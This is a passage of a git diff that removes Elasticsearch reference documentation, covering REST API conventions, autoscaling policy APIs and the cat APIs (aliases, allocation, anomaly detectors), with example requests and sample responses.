/library/book?refresh -{"title": "Book #3", "rating": 0.1} -GET /_search?filter_path=hits.hits._source&_source=title&sort=rating:desc --------------------------------------------------- - -[source,console-result] --------------------------------------------------- -{ - "hits" : { - "hits" : [ { - "_source":{"title":"Book #1"} - }, { - "_source":{"title":"Book #2"} - }, { - "_source":{"title":"Book #3"} - } ] - } -} --------------------------------------------------- - - -[discrete] -==== Flat Settings - -The `flat_settings` flag affects rendering of the lists of settings. When the -`flat_settings` flag is `true`, settings are returned in a flat format: - -[source,console] --------------------------------------------------- -GET my-index-000001/_settings?flat_settings=true --------------------------------------------------- -// TEST[setup:my_index] - -Returns: - -[source,console-result] --------------------------------------------------- -{ - "my-index-000001" : { - "settings": { - "index.number_of_replicas": "1", - "index.number_of_shards": "1", - "index.creation_date": "1474389951325", - "index.uuid": "n6gzFZTgS664GUfx0Xrpjw", - "index.version.created": ..., - "index.routing.allocation.include._tier_preference" : "data_content", - "index.provided_name" : "my-index-000001" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/1474389951325/$body.my-index-000001.settings.index\\\\.creation_date/] -// TESTRESPONSE[s/n6gzFZTgS664GUfx0Xrpjw/$body.my-index-000001.settings.index\\\\.uuid/] -// TESTRESPONSE[s/"index.version.created": \.\.\./"index.version.created": $body.my-index-000001.settings.index\\\\.version\\\\.created/] - -When the `flat_settings` flag is `false`, settings are returned in a more -human readable structured format: - -[source,console] --------------------------------------------------- -GET my-index-000001/_settings?flat_settings=false --------------------------------------------------- -// TEST[setup:my_index] - -Returns: - -[source,console-result] --------------------------------------------------- -{ - "my-index-000001" : { - "settings" : { - "index" : { - "number_of_replicas": "1", - "number_of_shards": "1", - "creation_date": "1474389951325", - "uuid": "n6gzFZTgS664GUfx0Xrpjw", - "version": { - "created": ... - }, - "routing": { - "allocation": { - "include": { - "_tier_preference": "data_content" - } - } - }, - "provided_name" : "my-index-000001" - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/1474389951325/$body.my-index-000001.settings.index.creation_date/] -// TESTRESPONSE[s/n6gzFZTgS664GUfx0Xrpjw/$body.my-index-000001.settings.index.uuid/] -// TESTRESPONSE[s/"created": \.\.\./"created": $body.my-index-000001.settings.index.version.created/] - -By default `flat_settings` is set to `false`. - -[discrete] -[[api-conventions-parameters]] -==== Parameters - -Rest parameters (when using HTTP, map to HTTP URL parameters) follow the -convention of using underscore casing. - -[discrete] -==== Boolean Values - -All REST API parameters (both request parameters and JSON body) support -providing boolean "false" as the value `false` and boolean "true" as the -value `true`. All other values will raise an error. - -[discrete] -==== Number Values - -All REST APIs support providing numbered parameters as `string` on top -of supporting the native JSON number types. - -[[time-units]] -[discrete] -==== Time units - -Whenever durations need to be specified, e.g. for a `timeout` parameter, the duration must specify -the unit, like `2d` for 2 days. The supported units are: - -[horizontal] -`d`:: Days -`h`:: Hours -`m`:: Minutes -`s`:: Seconds -`ms`:: Milliseconds -`micros`:: Microseconds -`nanos`:: Nanoseconds - -[[byte-units]] -[discrete] -==== Byte size units - -Whenever the byte size of data needs to be specified, e.g. when setting a buffer size -parameter, the value must specify the unit, like `10kb` for 10 kilobytes. Note that -these units use powers of 1024, so `1kb` means 1024 bytes. The supported units are: - -[horizontal] -`b`:: Bytes -`kb`:: Kilobytes -`mb`:: Megabytes -`gb`:: Gigabytes -`tb`:: Terabytes -`pb`:: Petabytes - -[[size-units]] -[discrete] -==== Unit-less quantities - -Unit-less quantities means that they don't have a "unit" like "bytes" or "Hertz" or "meter" or "long tonne". - -If one of these quantities is large we'll print it out like 10m for 10,000,000 or 7k for 7,000. We'll still print 87 -when we mean 87 though. These are the supported multipliers: - -[horizontal] -`k`:: Kilo -`m`:: Mega -`g`:: Giga -`t`:: Tera -`p`:: Peta - -[[distance-units]] -[discrete] -==== Distance Units - -Wherever distances need to be specified, such as the `distance` parameter in -the <>), the default unit is meters if none is specified. -Distances can be specified in other units, such as `"1km"` or -`"2mi"` (2 miles). - -The full list of units is listed below: - -[horizontal] -Mile:: `mi` or `miles` -Yard:: `yd` or `yards` -Feet:: `ft` or `feet` -Inch:: `in` or `inch` -Kilometer:: `km` or `kilometers` -Meter:: `m` or `meters` -Centimeter:: `cm` or `centimeters` -Millimeter:: `mm` or `millimeters` -Nautical mile:: `NM`, `nmi`, or `nauticalmiles` - -[[fuzziness]] -[discrete] -==== Fuzziness - -Some queries and APIs support parameters to allow inexact _fuzzy_ matching, -using the `fuzziness` parameter. - -When querying `text` or `keyword` fields, `fuzziness` is interpreted as a -{wikipedia}/Levenshtein_distance[Levenshtein Edit Distance] --- the number of one character changes that need to be made to one string to -make it the same as another string. - -The `fuzziness` parameter can be specified as: - -[horizontal] -`0`, `1`, `2`:: - -The maximum allowed Levenshtein Edit Distance (or number of edits) - -`AUTO`:: -+ --- -Generates an edit distance based on the length of the term. -Low and high distance arguments may be optionally provided `AUTO:[low],[high]`. If not specified, -the default values are 3 and 6, equivalent to `AUTO:3,6` that make for lengths: - -`0..2`:: Must match exactly -`3..5`:: One edit allowed -`>5`:: Two edits allowed - -`AUTO` should generally be the preferred value for `fuzziness`. --- - -[discrete] -[[common-options-error-options]] -==== Enabling stack traces - -By default when a request returns an error Elasticsearch doesn't include the -stack trace of the error. You can enable that behavior by setting the -`error_trace` url parameter to `true`. For example, by default when you send an -invalid `size` parameter to the `_search` API: - -[source,console] ----------------------------------------------------------------------- -POST /my-index-000001/_search?size=surprise_me ----------------------------------------------------------------------- -// TEST[s/surprise_me/surprise_me&error_trace=false/ catch:bad_request] -// Since the test system sends error_trace=true by default we have to override - -The response looks like: - -[source,console-result] ----------------------------------------------------------------------- -{ - "error" : { - "root_cause" : [ - { - "type" : "illegal_argument_exception", - "reason" : "Failed to parse int parameter [size] with value [surprise_me]" - } - ], - "type" : "illegal_argument_exception", - "reason" : "Failed to parse int parameter [size] with value [surprise_me]", - "caused_by" : { - "type" : "number_format_exception", - "reason" : "For input string: \"surprise_me\"" - } - }, - "status" : 400 -} ----------------------------------------------------------------------- - -But if you set `error_trace=true`: - -[source,console] ----------------------------------------------------------------------- -POST /my-index-000001/_search?size=surprise_me&error_trace=true ----------------------------------------------------------------------- -// TEST[catch:bad_request] - -The response looks like: - -[source,console-result] ----------------------------------------------------------------------- -{ - "error": { - "root_cause": [ - { - "type": "illegal_argument_exception", - "reason": "Failed to parse int parameter [size] with value [surprise_me]", - "stack_trace": "Failed to parse int parameter [size] with value [surprise_me]]; nested: IllegalArgumentException..." - } - ], - "type": "illegal_argument_exception", - "reason": "Failed to parse int parameter [size] with value [surprise_me]", - "stack_trace": "java.lang.IllegalArgumentException: Failed to parse int parameter [size] with value [surprise_me]\n at org.elasticsearch.rest.RestRequest.paramAsInt(RestRequest.java:175)...", - "caused_by": { - "type": "number_format_exception", - "reason": "For input string: \"surprise_me\"", - "stack_trace": "java.lang.NumberFormatException: For input string: \"surprise_me\"\n at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65)..." - } - }, - "status": 400 -} ----------------------------------------------------------------------- -// TESTRESPONSE[s/"stack_trace": "Failed to parse int parameter.+\.\.\."/"stack_trace": $body.error.root_cause.0.stack_trace/] -// TESTRESPONSE[s/"stack_trace": "java.lang.IllegalArgum.+\.\.\."/"stack_trace": $body.error.stack_trace/] -// TESTRESPONSE[s/"stack_trace": "java.lang.Number.+\.\.\."/"stack_trace": $body.error.caused_by.stack_trace/] - -[discrete] -==== Request body in query string - -For libraries that don't accept a request body for non-POST requests, -you can pass the request body as the `source` query string parameter -instead. When using this method, the `source_content_type` parameter -should also be passed with a media type value that indicates the format -of the source, such as `application/json`. - -[discrete] -==== Content-Type Requirements - -The type of the content sent in a request body must be specified using -the `Content-Type` header. The value of this header must map to one of -the supported formats that the API supports. Most APIs support JSON, -YAML, CBOR, and SMILE. The bulk and multi-search APIs support NDJSON, -JSON, and SMILE; other types will result in an error response. - -Additionally, when using the `source` query string parameter, the -content type must be specified using the `source_content_type` query -string parameter. - -[[url-access-control]] -=== URL-based access control - -Many users use a proxy with URL-based access control to secure access to -{es} data streams and indices. For <>, -<>, and <> requests, the user has -the choice of specifying a data stream or index in the URL and on each individual request -within the request body. This can make URL-based access control challenging. - -To prevent the user from overriding the data stream or index specified in the -URL, set `rest.action.multi.allow_explicit_index` to `false` in `elasticsearch.yml`. - - -This causes {es} to -reject requests that explicitly specify a data stream or index in the request body. diff --git a/docs/reference/autoscaling/apis/autoscaling-apis.asciidoc b/docs/reference/autoscaling/apis/autoscaling-apis.asciidoc deleted file mode 100644 index d8f97a00771..00000000000 --- a/docs/reference/autoscaling/apis/autoscaling-apis.asciidoc +++ /dev/null @@ -1,21 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[autoscaling-apis]] -== Autoscaling APIs - -You can use the following APIs to perform autoscaling operations. - -[discrete] -[[autoscaling-api-top-level]] -=== Top-Level - -* <> -* <> -* <> -* <> - -// top-level -include::get-autoscaling-decision.asciidoc[] -include::delete-autoscaling-policy.asciidoc[] -include::get-autoscaling-policy.asciidoc[] -include::put-autoscaling-policy.asciidoc[] diff --git a/docs/reference/autoscaling/apis/delete-autoscaling-policy.asciidoc b/docs/reference/autoscaling/apis/delete-autoscaling-policy.asciidoc deleted file mode 100644 index 8708e9799a7..00000000000 --- a/docs/reference/autoscaling/apis/delete-autoscaling-policy.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[autoscaling-delete-autoscaling-policy]] -=== Delete autoscaling policy API -++++ -Delete autoscaling policy -++++ - -Delete autoscaling policy. - -[[autoscaling-delete-autoscaling-policy-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -PUT /_autoscaling/policy/my_autoscaling_policy -{ - "policy": { - "deciders": { - "fixed": { - } - } - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_autoscaling/policy/ --------------------------------------------------- -// TEST[s//my_autoscaling_policy/] - -[[autoscaling-delete-autoscaling-policy-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have -`manage_autoscaling` cluster privileges. For more information, see -<>. - -[[autoscaling-delete-autoscaling-policy-desc]] -==== {api-description-title} - -This API deletes an autoscaling policy with the provided name. - -[[autoscaling-delete-autoscaling-policy-examples]] -==== {api-examples-title} - -This example deletes an autoscaling policy named `my_autosaling_policy`. - -[source,console] --------------------------------------------------- -DELETE /_autoscaling/policy/my_autoscaling_policy --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- diff --git a/docs/reference/autoscaling/apis/get-autoscaling-decision.asciidoc b/docs/reference/autoscaling/apis/get-autoscaling-decision.asciidoc deleted file mode 100644 index dfa14ac1806..00000000000 --- a/docs/reference/autoscaling/apis/get-autoscaling-decision.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[autoscaling-get-autoscaling-decision]] -=== Get autoscaling decision API -++++ -Get autoscaling decision -++++ - -Get autoscaling decision. - -[[autoscaling-get-autoscaling-decision-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -GET /_autoscaling/decision/ --------------------------------------------------- -// TEST - -[[autoscaling-get-autoscaling-decision-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have -`manage_autoscaling` cluster privileges. For more information, see -<>. - -[[autoscaling-get-autoscaling-decision-desc]] -==== {api-description-title} - -This API gets the current autoscaling decision based on the configured -autoscaling policy. This API will return whether or not autoscaling is -needed. - -[[autoscaling-get-autoscaling-decision-examples]] -==== {api-examples-title} - -This example retrieves the current autoscaling decision. - -[source,console] --------------------------------------------------- -GET /_autoscaling/decision --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - decisions: [] -} --------------------------------------------------- diff --git a/docs/reference/autoscaling/apis/get-autoscaling-policy.asciidoc b/docs/reference/autoscaling/apis/get-autoscaling-policy.asciidoc deleted file mode 100644 index 35db9d3a7fe..00000000000 --- a/docs/reference/autoscaling/apis/get-autoscaling-policy.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[autoscaling-get-autoscaling-policy]] -=== Get autoscaling policy API -++++ -Get autoscaling policy -++++ - -Get autoscaling policy. - -[[autoscaling-get-autoscaling-policy-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -PUT /_autoscaling/policy/my_autoscaling_policy -{ - "policy": { - "deciders": { - "fixed": { - } - } - } -} --------------------------------------------------- -// TESTSETUP - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_autoscaling/policy/my_autoscaling_policy --------------------------------------------------- -// TEST -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_autoscaling/policy/ --------------------------------------------------- -// TEST[s//my_autoscaling_policy/] - -[[autoscaling-get-autoscaling-policy-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have -`manage_autoscaling` cluster privileges. For more information, see -<>. - -[[autoscaling-get-autoscaling-policy-desc]] -==== {api-description-title} - -This API gets an autoscaling policy with the provided name. - -[[autoscaling-get-autoscaling-policy-examples]] -==== {api-examples-title} - -This example gets an autoscaling policy named `my_autosaling_policy`. - -[source,console] --------------------------------------------------- -GET /_autoscaling/policy/my_autoscaling_policy --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "policy": { - "deciders": - } -} --------------------------------------------------- -// TEST[s//$body.policy.deciders/] diff --git a/docs/reference/autoscaling/apis/put-autoscaling-policy.asciidoc b/docs/reference/autoscaling/apis/put-autoscaling-policy.asciidoc deleted file mode 100644 index 3c831ebbbab..00000000000 --- a/docs/reference/autoscaling/apis/put-autoscaling-policy.asciidoc +++ /dev/null @@ -1,87 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[autoscaling-put-autoscaling-policy]] -=== Put autoscaling policy API -++++ -Put autoscaling policy -++++ - -Put autoscaling policy. - -[[autoscaling-put-autoscaling-policy-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -PUT /_autoscaling/policy/ -{ - "policy": { - "deciders": { - "fixed": { - } - } - } -} --------------------------------------------------- -// TEST[s//name/] - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_autoscaling/policy/name --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[[autoscaling-put-autoscaling-policy-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have -`manage_autoscaling` cluster privileges. For more information, see -<>. - -[[autoscaling-put-autoscaling-policy-desc]] -==== {api-description-title} - -This API puts an autoscaling policy with the provided name. - -[[autoscaling-put-autoscaling-policy-examples]] -==== {api-examples-title} - -This example puts an autoscaling policy named `my_autoscaling_policy` using the -always autoscaling decider. - -[source,console] --------------------------------------------------- -PUT /_autoscaling/policy/my_autoscaling_policy -{ - "policy": { - "deciders": { - "fixed": { - } - } - } -} --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_autoscaling/policy/my_autoscaling_policy --------------------------------------------------- -// TEST[continued] - -////////////////////////// diff --git a/docs/reference/autoscaling/index.asciidoc b/docs/reference/autoscaling/index.asciidoc deleted file mode 100644 index f8f1f98c042..00000000000 --- a/docs/reference/autoscaling/index.asciidoc +++ /dev/null @@ -1,19 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[xpack-autoscaling]] -[chapter] -= Autoscaling - -experimental[] - -The autoscaling feature enables an operator to configure tiers of nodes that -self-monitor whether or not they need to scale based on an operator-defined -policy. Then, via the autoscaling API, an Elasticsearch cluster can report -whether or not it needs additional resources to meet the policy. For example, an -operator could define a policy that a warm tier should scale on available disk -space. Elasticsearch would monitor and forecast the available disk space in the -warm tier, and if the forecast is such that the cluster will soon not be able to -allocate existing and future shard copies due to disk space, then the -autoscaling API would report that the cluster needs to scale due to disk space. -It remains the responsibility of the operator to add the additional resources -that the cluster signals it requires. diff --git a/docs/reference/cat.asciidoc b/docs/reference/cat.asciidoc deleted file mode 100644 index 8676c7cf502..00000000000 --- a/docs/reference/cat.asciidoc +++ /dev/null @@ -1,273 +0,0 @@ -[[cat]] -== Compact and aligned text (CAT) APIs - -["float",id="intro"] -=== Introduction - -JSON is great... for computers. Even if it's pretty-printed, trying -to find relationships in the data is tedious. Human eyes, especially -when looking at a terminal, need compact and aligned text. The compact and -aligned text (CAT) APIs aim to meet this need. - -[IMPORTANT] -==== -cat APIs are only intended for human consumption using the -{kibana-ref}/console-kibana.html[Kibana console] or command line. They are _not_ -intended for use by applications. For application consumption, we recommend -using a corresponding JSON API. -==== - -All the cat commands accept a query string parameter `help` to see all -the headers and info they provide, and the `/_cat` command alone lists all -the available commands. - -[discrete] -[[common-parameters]] -=== Common parameters - -[discrete] -[[verbose]] -==== Verbose - -Each of the commands accepts a query string parameter `v` to turn on -verbose output. For example: - -[source,console] --------------------------------------------------- -GET /_cat/master?v=true --------------------------------------------------- - -Might respond with: - -[source,txt] --------------------------------------------------- -id host ip node -u_n93zwxThWHi1PDBJAGAg 127.0.0.1 127.0.0.1 u_n93zw --------------------------------------------------- -// TESTRESPONSE[s/u_n93zw(xThWHi1PDBJAGAg)?/.+/ non_json] - -[discrete] -[[help]] -==== Help - -Each of the commands accepts a query string parameter `help` which will -output its available columns. For example: - -[source,console] --------------------------------------------------- -GET /_cat/master?help --------------------------------------------------- - -Might respond with: - -[source,txt] --------------------------------------------------- -id | | node id -host | h | host name -ip | | ip address -node | n | node name --------------------------------------------------- -// TESTRESPONSE[s/[|]/[|]/ non_json] - -NOTE: `help` is not supported if any optional url parameter is used. -For example `GET _cat/shards/my-index-000001?help` or `GET _cat/indices/my-index-*?help` -results in an error. Use `GET _cat/shards?help` or `GET _cat/indices?help` -instead. - -[discrete] -[[headers]] -==== Headers - -Each of the commands accepts a query string parameter `h` which forces -only those columns to appear. For example: - -[source,console] --------------------------------------------------- -GET /_cat/nodes?h=ip,port,heapPercent,name --------------------------------------------------- - -Responds with: - -[source,txt] --------------------------------------------------- -127.0.0.1 9300 27 sLBaIGK --------------------------------------------------- -// TESTRESPONSE[s/9300 27 sLBaIGK/\\d+ \\d+ .+/ non_json] - -You can also request multiple columns using simple wildcards like -`/_cat/thread_pool?h=ip,queue*` to get all headers (or aliases) starting -with `queue`. - -[discrete] -[[numeric-formats]] -==== Numeric formats - -Many commands provide a few types of numeric output, either a byte, size -or a time value. By default, these types are human-formatted, -for example, `3.5mb` instead of `3763212`. The human values are not -sortable numerically, so in order to operate on these values where -order is important, you can change it. - -Say you want to find the largest index in your cluster (storage used -by all the shards, not number of documents). The `/_cat/indices` API -is ideal. You only need to add three things to the API request: - -. The `bytes` query string parameter with a value of `b` to get byte-level resolution. -. The `s` (sort) parameter with a value of `store.size:desc` to sort the output -by shard storage in descending order. -. The `v` (verbose) parameter to include column headings in the response. - -[source,console] --------------------------------------------------- -GET /_cat/indices?bytes=b&s=store.size:desc&v=true --------------------------------------------------- -// TEST[setup:my_index_huge] -// TEST[s/^/PUT my-index-000002\n{"settings": {"number_of_replicas": 0}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -health status index uuid pri rep docs.count docs.deleted store.size pri.store.size -yellow open my-index-000001 u8FNjxh8Rfy_awN11oDKYQ 1 1 1200 0 72171 72171 -green open my-index-000002 nYFWZEO7TUiOjLQXBaYJpA 1 0 0 0 230 230 --------------------------------------------------- -// TESTRESPONSE[s/72171|230/\\d+/] -// TESTRESPONSE[s/u8FNjxh8Rfy_awN11oDKYQ|nYFWZEO7TUiOjLQXBaYJpA/.+/ non_json] -// TESTRESPONSE[skip:"AwaitsFix https://github.com/elastic/elasticsearch/issues/51619"] - -If you want to change the <>, use `time` parameter. - -If you want to change the <>, use `size` parameter. - -If you want to change the <>, use `bytes` parameter. - -[discrete] -==== Response as text, json, smile, yaml or cbor - -[source,sh] --------------------------------------------------- -% curl 'localhost:9200/_cat/indices?format=json&pretty' -[ - { - "pri.store.size": "650b", - "health": "yellow", - "status": "open", - "index": "my-index-000001", - "pri": "5", - "rep": "1", - "docs.count": "0", - "docs.deleted": "0", - "store.size": "650b" - } -] --------------------------------------------------- -// NOTCONSOLE - -Currently supported formats (for the `?format=` parameter): -- text (default) -- json -- smile -- yaml -- cbor - -Alternatively you can set the "Accept" HTTP header to the appropriate media format. -All formats above are supported, the GET parameter takes precedence over the header. -For example: - -[source,sh] --------------------------------------------------- -% curl '192.168.56.10:9200/_cat/indices?pretty' -H "Accept: application/json" -[ - { - "pri.store.size": "650b", - "health": "yellow", - "status": "open", - "index": "my-index-000001", - "pri": "5", - "rep": "1", - "docs.count": "0", - "docs.deleted": "0", - "store.size": "650b" - } -] --------------------------------------------------- -// NOTCONSOLE - -[discrete] -[[sort]] -==== Sort - -Each of the commands accepts a query string parameter `s` which sorts the table by -the columns specified as the parameter value. Columns are specified either by name or by -alias, and are provided as a comma separated string. By default, sorting is done in -ascending fashion. Appending `:desc` to a column will invert the ordering for -that column. `:asc` is also accepted but exhibits the same behavior as the default sort order. - -For example, with a sort string `s=column1,column2:desc,column3`, the table will be -sorted in ascending order by column1, in descending order by column2, and in ascending -order by column3. - -[source,sh] --------------------------------------------------- -GET _cat/templates?v=true&s=order:desc,index_patterns --------------------------------------------------- -//CONSOLE - -returns: - -[source,txt] --------------------------------------------------- -name index_patterns order version -pizza_pepperoni [*pepperoni*] 2 -sushi_california_roll [*avocado*] 1 1 -pizza_hawaiian [*pineapples*] 1 --------------------------------------------------- - -include::cat/alias.asciidoc[] - -include::cat/allocation.asciidoc[] - -include::cat/anomaly-detectors.asciidoc[] - -include::cat/count.asciidoc[] - -include::cat/dataframeanalytics.asciidoc[] - -include::cat/datafeeds.asciidoc[] - -include::cat/fielddata.asciidoc[] - -include::cat/health.asciidoc[] - -include::cat/indices.asciidoc[] - -include::cat/master.asciidoc[] - -include::cat/nodeattrs.asciidoc[] - -include::cat/nodes.asciidoc[] - -include::cat/pending_tasks.asciidoc[] - -include::cat/plugins.asciidoc[] - -include::cat/recovery.asciidoc[] - -include::cat/repositories.asciidoc[] - -include::cat/segments.asciidoc[] - -include::cat/shards.asciidoc[] - -include::cat/snapshots.asciidoc[] - -include::cat/tasks.asciidoc[] - -include::cat/templates.asciidoc[] - -include::cat/thread_pool.asciidoc[] - -include::cat/trainedmodel.asciidoc[] - -include::cat/transforms.asciidoc[] diff --git a/docs/reference/cat/alias.asciidoc b/docs/reference/cat/alias.asciidoc deleted file mode 100644 index b9aaaa6eb38..00000000000 --- a/docs/reference/cat/alias.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[[cat-alias]] -=== cat aliases API -++++ -cat aliases -++++ - -Returns information about currently configured aliases to indices, including -filter and routing information. - - -[[cat-alias-api-request]] -==== {api-request-title} - -`GET /_cat/aliases/` - -`GET /_cat/aliases` - -[[cat-alias-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`view_index_metadata` or `manage` <> -for any alias you retrieve. - -[[cat-alias-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-alias] - - -[[cat-alias-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - - -[[cat-alias-api-example]] -==== {api-examples-title} - -//// -Hidden setup for example: -[source,console] --------------------------------------------------- -PUT test1 -{ - "aliases": { - "alias1": {}, - "alias2": { - "filter": { - "match": { - "user.id": "kimchy" - } - } - }, - "alias3": { - "routing": "1" - }, - "alias4": { - "index_routing": "2", - "search_routing": "1,2" - } - } -} --------------------------------------------------- -//// - -[source,console] --------------------------------------------------- -GET /_cat/aliases?v=true --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -alias index filter routing.index routing.search is_write_index -alias1 test1 - - - - -alias2 test1 * - - - -alias3 test1 - 1 1 - -alias4 test1 - 2 1,2 - --------------------------------------------------- -// TESTRESPONSE[s/[*]/[*]/ non_json] - -This response shows that `alias2` has configured a filter, and specific routing -configurations in `alias3` and `alias4`. - -If you only want to get information about specific aliases, you can specify -the aliases in comma-delimited format as a URL parameter, e.g., -/_cat/aliases/alias1,alias2. diff --git a/docs/reference/cat/allocation.asciidoc b/docs/reference/cat/allocation.asciidoc deleted file mode 100644 index 8f9e9ac8c62..00000000000 --- a/docs/reference/cat/allocation.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[[cat-allocation]] -=== cat allocation API -++++ -cat allocation -++++ - - -Provides a snapshot of the number of shards allocated to each data node -and their disk space. - - -[[cat-allocation-api-request]] -==== {api-request-title} - -`GET /_cat/allocation/` - -`GET /_cat/allocation` - -[[cat-allocation-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-allocation-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - -[[cat-allocation-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -[[cat-allocation-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cat/allocation?v=true --------------------------------------------------- -// TEST[s/^/PUT test\n{"settings": {"number_of_replicas": 0}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -shards disk.indices disk.used disk.avail disk.total disk.percent host ip node - 1 260b 47.3gb 43.4gb 100.7gb 46 127.0.0.1 127.0.0.1 CSUXak2 --------------------------------------------------- -// TESTRESPONSE[s/\d+(\.\d+)?[tgmk]?b/\\d+(\\.\\d+)?[tgmk]?b/ s/46/\\d+/] -// TESTRESPONSE[s/CSUXak2/.+/ non_json] - -This response shows a single shard is allocated to the one node available. diff --git a/docs/reference/cat/anomaly-detectors.asciidoc b/docs/reference/cat/anomaly-detectors.asciidoc deleted file mode 100644 index 33c5016787c..00000000000 --- a/docs/reference/cat/anomaly-detectors.asciidoc +++ /dev/null @@ -1,283 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[cat-anomaly-detectors]] -=== cat anomaly detectors API -++++ -cat anomaly detectors -++++ - -Returns configuration and usage information about {anomaly-jobs}. - -[[cat-anomaly-detectors-request]] -==== {api-request-title} - -`GET /_cat/ml/anomaly_detectors/` + - -`GET /_cat/ml/anomaly_detectors` - -[[cat-anomaly-detectors-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - - -[[cat-anomaly-detectors-desc]] -==== {api-description-title} - -See {ml-docs}/ml-jobs.html[{anomaly-jobs-cap}]. - -NOTE: This API returns a maximum of 10,000 jobs. - -[[cat-anomaly-detectors-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[cat-anomaly-detectors-query-params]] -==== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-jobs] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ -If you do not specify which columns to include, the API returns the default -columns. If you explicitly specify one or more columns, it returns only the -specified columns. -+ -Valid columns are: - -`assignment_explanation`, `ae`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=assignment-explanation-anomaly-jobs] - -`buckets.count`, `bc`, `bucketsCount`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count-anomaly-jobs] - -`buckets.time.exp_avg`, `btea`, `bucketsTimeExpAvg`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-exponential-average] - -`buckets.time.exp_avg_hour`, `bteah`, `bucketsTimeExpAvgHour`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-exponential-average-hour] - -`buckets.time.max`, `btmax`, `bucketsTimeMax`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-maximum] - -`buckets.time.min`, `btmin`, `bucketsTimeMin`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-minimum] - -`buckets.time.total`, `btt`, `bucketsTimeTotal`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-total] - -`data.buckets`, `db`, `dataBuckets`::: 